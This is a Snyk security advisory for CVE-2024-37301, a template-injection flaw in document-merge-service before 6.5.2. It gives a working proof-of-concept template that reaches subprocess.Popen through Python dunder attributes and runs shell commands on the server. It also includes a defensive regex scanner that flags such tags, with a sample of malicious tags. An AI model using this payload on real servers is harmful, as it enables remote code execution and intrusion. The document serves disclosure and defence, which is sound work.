Improper Neutralization of Special Elements Used in a Template Engine Affecting document-merge-service package, versions [,6.5.2)
Snyk ID SNYK-PYTHON-DOCUMENTMERGESERVICE-7247198
- published 12 Jun 2024
- disclosed 11 Jun 2024
- credit c0rydoras
Introduced: 11 Jun 2024
CVE-2024-37301
How to fix?
Upgrade document-merge-service to version 6.5.2 or higher.
Overview
document-merge-service is a Merge Document Template Service.
Affected versions of this package are vulnerable to Improper Neutralization of Special Elements Used in a Template Engine. Template expressions in an uploaded document are evaluated in the server's context, which runs as the user with UID 901, so an attacker can execute arbitrary code on the server by injecting malicious templates.
PoC
Add the following to a document, upload and render it:
{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %}
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}
whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}
uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}
{% endif %}
The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}, then get the index of subprocess.Popen and replace 202 with that.
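The PoC works because the template engine lets an uploaded document reach Python internals through dunder attributes (__class__, __mro__, __subclasses__). The fix is the upgrade above; as an added defence-in-depth check (example code written for this page, not part of document-merge-service), the scanner below pre-screens template text before it is handed to the renderer and flags any tag that uses a dunder name or the attr filter (which performs a dynamic attribute lookup from a string and is the usual way to hide the same chain). The tag syntax, the SAMPLE document and the finding format are assumptions constructed here.

```python
import re

# Jinja-style expression ({{ ... }}) and statement ({% ... %}) tags; DOTALL so
# a tag split across lines in a document is still captured as one unit.
TAG_RE = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.DOTALL)

# Any dunder identifier inside a tag: __class__, __mro__, __subclasses__,
# __globals__, ... Matching the token anywhere in the tag body also catches
# the string form used in subscripts such as x["__class__"].
DUNDER_RE = re.compile(r"__[A-Za-z]+__")

# The attr filter resolves an attribute from a runtime string, so a template
# can spell the same chain without a literal dunder appearing in the source.
ATTR_FILTER_RE = re.compile(r"\battr\s*\(")


def scan_template(text):
    """Return a list of findings for every tag that touches Python internals.

    Each finding is a dict with the 1-based line of the tag, a reason, and the
    offending tag body. An empty list means nothing suspicious was seen.
    """
    findings = []
    for match in TAG_RE.finditer(text):
        body = match.group(1) if match.group(1) is not None else match.group(2)
        body = body.strip()
        line = text.count("\n", 0, match.start()) + 1
        for name in DUNDER_RE.findall(body):
            findings.append({"line": line,
                             "reason": "dunder attribute %s" % name,
                             "tag": body})
        if ATTR_FILTER_RE.search(body):
            findings.append({"line": line,
                             "reason": "attr filter (dynamic attribute lookup)",
                             "tag": body})
    return findings


def is_template_safe(text):
    """True when the pre-screen found no dunder access and no attr filter."""
    return not scan_template(text)


# Constructed sample: two legitimate merge fields, then two tags of the kind
# the advisory describes (a dunder chain and the attr-filter spelling).
SAMPLE = """Dear {{ customer.name }},
Your invoice total is {{ invoice.total | round(2) }}.
{% if customer.__class__ %}x{% endif %}
{{ customer | attr("__subclasses__") }}
"""

if __name__ == "__main__":
    for finding in scan_template(SAMPLE):
        print("line %(line)d: %(reason)s in {{ %(tag)s }}" % finding)
    print("safe:", is_template_safe(SAMPLE))
```

Reject the upload (or route it for review) whenever scan_template returns findings; normal merge fields such as customer.name and ordinary filters like round pass untouched. A regex pre-screen is a complement to the patched version and to rendering in a sandboxed environment, not a substitute: it reports what it can see in the source, and the renderer must still be the one that refuses the access at run time.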